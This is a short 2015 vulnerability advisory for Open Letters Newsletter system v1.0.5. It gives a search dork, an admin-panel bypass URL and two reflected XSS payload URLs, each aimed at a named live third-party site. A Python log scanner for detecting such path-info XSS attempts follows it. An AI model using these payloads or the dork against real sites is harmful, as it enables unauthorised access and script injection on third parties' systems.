Open Letters Newsletter system version 1.0.5 suffers from administrative bypass and cross site scripting vulnerabilities. Note that this finding houses site-specific data.
eb31e179eff6e05f01694b31bdaf5986e9b9d4d4651c55d3c3b851d1f5b3094a
| # Title : Open Letters Newsletter system v1.0.5 Multiple Vulnerabilities
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : intext:© 2015 Example.com - Impressum
| # Tested on: Win8.1 fr pro / 12:11 * 15/05/2015
| # Bug : Multiple
| # Download : http://www.open-letters.de/?file=tl_files/open_letters/grafik/newslettersystem/2014-10-27_Open-Letters_Newslettersystem_v1.0.5.zip
=======================================
Admin Panel Bypass :
http://www.top-markt.net/newsletter/admin/
Cross-site scripting :
https://www.tegernsee-solar.de/nl/index.php/%22onmouseover%3d'prompt%28988047%29'bad%3d%22%3E
XSS / HTML injection :
https://www.tegernsee-solar.de/nl/index.php/%22%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22%3E
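Both XSS URLs above carry the injected markup in the path segment that follows index.php. The following is an added example, not part of the original advisory or of the Open Letters code: a log check that flags requests whose path info after a .php script decodes to quote or angle-bracket characters. The combined log format, the addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let reflected path text close an HTML attribute or open a tag.
MARKUP_CHARS = set("\"'<>")

def suspicious_path_info(request_target):
    """Return the decoded path info after a .php script if it holds markup characters."""
    path = request_target.split("?", 1)[0]          # ignore the query string
    _script, sep, path_info = path.partition(".php/")
    if not sep:
        return None                                 # no path info after the script
    decoded = unquote(unquote(path_info))           # second pass catches double encoding
    return decoded if MARKUP_CHARS & set(decoded) else None

def scan(lines):
    """Return (client address, decoded path info) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        info = suspicious_path_info(match.group(1))
        if info is not None:
            hits.append((line.split(" ", 1)[0], info))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [15/May/2015:12:11:00 +0200] "GET /nl/index.php/%22onmouseover%3d'prompt%281%29'bad%3d%22%3E HTTP/1.1" 200 5120
198.51.100.9 - - [15/May/2015:12:11:04 +0200] "GET /nl/index.php/archive/2015 HTTP/1.1" 200 4096
203.0.113.5 - - [15/May/2015:12:11:09 +0200] "GET /nl/index.php?id=3 HTTP/1.1" 200 3000
203.0.113.8 - - [15/May/2015:12:11:15 +0200] "GET /nl/index.php/%2522%253E HTTP/1.1" 200 5120
""".splitlines()

if __name__ == "__main__":
    for client, info in scan(SAMPLE_LOG):
        print(f"{client}\t{info!r}")
```

A hit shows that the request was made, not that the response reflected it unescaped; confirm against the page output before treating it as exploitation.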